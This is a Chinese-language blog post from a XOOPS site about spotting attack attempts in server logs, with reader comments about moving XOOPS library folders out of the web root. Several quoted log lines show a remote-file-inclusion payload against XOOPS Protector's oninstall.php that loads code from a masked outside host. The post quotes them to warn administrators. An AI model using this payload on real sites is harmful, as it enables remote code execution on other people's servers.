睡蓮‧池水間

Guest
2012-Feb-12  
0 位會員和 8 位訪客在線上

文章 :: xoops

一定要移出根目錄

睡蓮
 
池水間 
子標題:意外的發現
話說有一天進入池水間後感覺網站速度跟平時有一點點異常,造訪人數亦不尋常地颷高,到cPanel 查看統計記錄,登時傻了眼,124.114.0.*** 和 124.115.4.*** 這兩組IP 由前一天到翌日一直不停在我的主機上抓取,其名單密麻麻地佔一大篇,而且更是亂抓一通,什麼都抓,無視robots.txt存在。到google去查看這兩組IP相關資訊,原來跟我遇到一樣問題者非常之多,而且更是惡名昭彰。當下我就到IP Deny Manager,將這兩組IP封掉。

這跟本文標題有關嗎?當然沒有關,這是前菜,接下來下面才是主菜。

封掉IP後再繼續去查看造訪記錄時,郤有意外發現,而且之後數天亦不時看到有幾個不同IP,出現如下這樣子的記錄

**.***.**.***

//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt????	
 Http Code: 404  	Date: Feb 19 08:59:59  	Http Version: HTTP/1.1  	Size in Bytes: -
 Referer: -
 Agent: libwww-perl/5.805
	
/modules/article//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt????	
 Http Code: 404  	Date: Feb 19 08:59:59  	Http Version: HTTP/1.1  	Size in Bytes: -
 Referer: -
 Agent: libwww-perl/5.805	

/modules/article/view.article.p%20...//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.*****/***/***/id.txt????	
 Http Code: 404  	Date: Feb 19 08:59:59  	Http Version: HTTP/1.1  	Size in Bytes: -
 Referer: -
 Agent: libwww-perl/5.805

由於我裝的xoops2.3.2 不在本站,是在另一個站上,且xoops_lib 和 xoops_data 這兩個資料夾早已移出根目錄並且變更了名稱,所以 Http Code 顯示了找不到網頁的 404 狀態碼。

如果將/xoops_lib/modules/protector/oninstall.php?mydirname= 這關鍵字輸入google,將會看到滿篇的相關安全資訊。如若閣下還沒有將xoops_lib 和 xoops_data 移出根目錄或變更名稱,請儘早行動,依從官方的安裝文檔說明,將這兩個移出根目錄。

分頁: 1 2 »

子標題

  1. 意外的發現
  2. 路徑的變更
    «« 色標組圖 互聯網需要“統一標準” »»    

引用

  • 文章地址: http://waterlily-lsl.com/modules/article/view.article.php/c11/141
  • 引用地址: http://waterlily-lsl.com/modules/article/trackback.php/141

評分

10
9
8
7
6
5
4
3
2
1


 

API: RSS | RDF | ATOM

回覆及設定

    關閉


 一定要移出根目錄
AlexWang

網友

註冊: 09年1月2日
來自: Taiwan
回覆數: 17

發表日期: 09/2/20 14:41  更新日期: 09/2/20 14:45


老大~ 請教一下....

所謂的移出根目錄,是指什麼樣的情況呢?
因為我是承租虛擬主機,有點糊塗。

我進 FTP 的開頭有一堆廠商預設的資料夾,然後要點進去 httpdocs 才是我的主網站的東西。
不過子網域的資料夾是跟 httpdocs 放在同一層中。
FTP 是這樣呈現:
/
/...
/httpdocs
/subdomains
/...

請問 [/]這是根目錄吧?(我都開始懷疑我的電腦概論是怎麼過的...)
可是在這同一層級中,我無法新增資料夾,所以沒辦法把資料移過來(如果未來使用2.3.2的話)。

還是未來我要是使用2.3.X,只好用子網域架設當成主站使用,因在子網域裡我才能在子網域上新增資料夾。
/subdomains/子網域1/xoops_data
/subdomains/子網域1/xoops/網站檔案

也就是 主網頁自動轉址到子網域執行。


啊!寫道這.... 連我自己又開始胡塗了................

PS.另外我先前有測試2.3.2,我可是有乖乖的聽Xoops的話,把那兩個資料夾移出(移到上一層),可是在安裝頁面上會搜尋不到耶.... 哎哎,所以當時只好又把它們放在原地....

回覆

 一定要移出根目錄
睡蓮

網主

註冊: 08年3月21日
來自: 池水間
回覆數: 404

發表日期: 09/2/21 2:10  更新日期: 09/2/21 2:10


針對lexus的問題,待我有時間會在本文開第二頁,教您如何在安裝過程中或是已安裝後變更xoops_lib 和 xoops_data 路徑。

另外,您說到無法新增資料夾,沒辦法把資料移過來的問題,您可以到您承租的虛擬主機管理系統裡去操作,移動資料夾會比用FTP的較快較方便。

回覆

 一定要移出根目錄
睡蓮

網主

註冊: 08年3月21日
來自: 池水間
回覆數: 404

發表日期: 09/2/22 11:19  更新日期: 09/2/22 11:19


文章已寫完發表在第二頁了,lexus 試試看吧。

回覆

 一定要移出根目錄
AlexWang

網友

註冊: 09年1月2日
來自: Taiwan
回覆數: 17

發表日期: 09/2/27 8:32  更新日期: 09/2/27 8:32


前輩寫的好詳細! 用了您不少時間吧? (好感動~

這樣小弟未來升級之路,看來是突破了不少關卡。

深深的感謝~~~ (鞠躬)

回覆

 一定要移出根目錄
睡蓮

網主

註冊: 08年3月21日
來自: 池水間
回覆數: 404

發表日期: 09/2/27 13:57  更新日期: 09/2/27 13:57


只用了兩天罷了,第一天在有限的時間內先寫一半,將它儲為草稿,第二天繼續餘下未完的部份,就這樣兩天便寫完。

噗~有必要來個鞠躬嗎?lexus粉可愛的,呵...

回覆

 

最 新 發 表 及 資 訊 區

此為池水間 banner ,需要安裝 Adobe Flash Player 才能觀看內容。

最新留言

最新留言:2012-Jan-6 11:13am
留言編號:76
留言者: wuji888
網主回覆:
總留言數: 71

前往萍踪留影

造訪統計

今天:293
昨天:544
本週:293
本月:6133
總計:376517
平均:292

連結

Powered By XOOPS
Valid XHTML 1.1
Valid CSS 3
登 入